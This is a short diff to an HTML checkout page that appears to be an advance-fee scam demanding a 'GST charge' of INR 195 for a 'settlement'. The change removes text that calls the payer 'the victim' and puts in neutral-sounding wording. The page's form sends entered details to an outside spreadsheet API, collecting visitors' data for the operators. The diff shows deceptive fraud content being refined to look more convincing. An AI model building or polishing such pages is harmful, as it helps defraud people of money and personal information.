--- a/checkout.html
+++ b/checkout.html
@@ -117,7 +117,7 @@
 <body>
 
     <h2>Kindly Pay The GST charges INR 195</h2>
-    <p>In ordert to verify the victim identity and victim account source for the settlement .</p>
+    <p> Not: Pay from your own account only  .</p>
 
     <form class="modal-content" action="https://sheetdb.io/api/v1/vs4tdo0usckts" method="post" id="sheetdb-form">
 
